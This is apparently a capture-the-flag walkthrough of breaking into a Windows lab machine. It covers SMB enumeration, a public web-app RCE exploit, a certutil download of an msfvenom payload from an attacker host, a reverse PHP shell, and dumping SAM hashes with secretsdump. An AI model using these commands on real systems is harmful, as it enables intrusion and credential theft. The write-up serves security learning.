Initial nmap results. Lots to enumerate, SMB shares, a web server. Will start with the SMB shares and see what’s there and whether guest logon is enabled.

smbmap -H 10.10.19.145 -u anonymous -p ""

        Windows NO ACCESS

We can see we’ve read access to the Users folder, so will head into there.

There doesn’t appear to be much other than some NTUSER.dat files which I don’t believe leak any useful information. Exploring the web app on port 8080 reveals a vulnerable e-commerce app that will allow remote code execution.

A publicly available exploit allows us to pop a shell as system.

Just like magic.

The awkward psuedo-shell doesn’t let us navigate out of its starting directory and doesn’t seem to want to run powershell, so try using certutil we upload a payload crafted in msfvenom.

RCE_SHELL$ certutil.exe -urlcache -split -f "http://10.18.105.64/rv.exe" shell.exe

After a lot of faffing about I discovered that this psuedo shell is crap and unstable so head back to Exploit-DB and find another RCE. This time we can insert our own PHP payload so I found a reverse PHP payload on GitHub and formatted it into the script.

Ah that’s better…

We can quickly obtain the root flag, but to get the NTLM hashes I’ll dump the SAM database. To exfiltrate it we can move into the C:\xampp\htdoc folder that we can view from the public web server and use secretsdump to extract hashes.

./secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
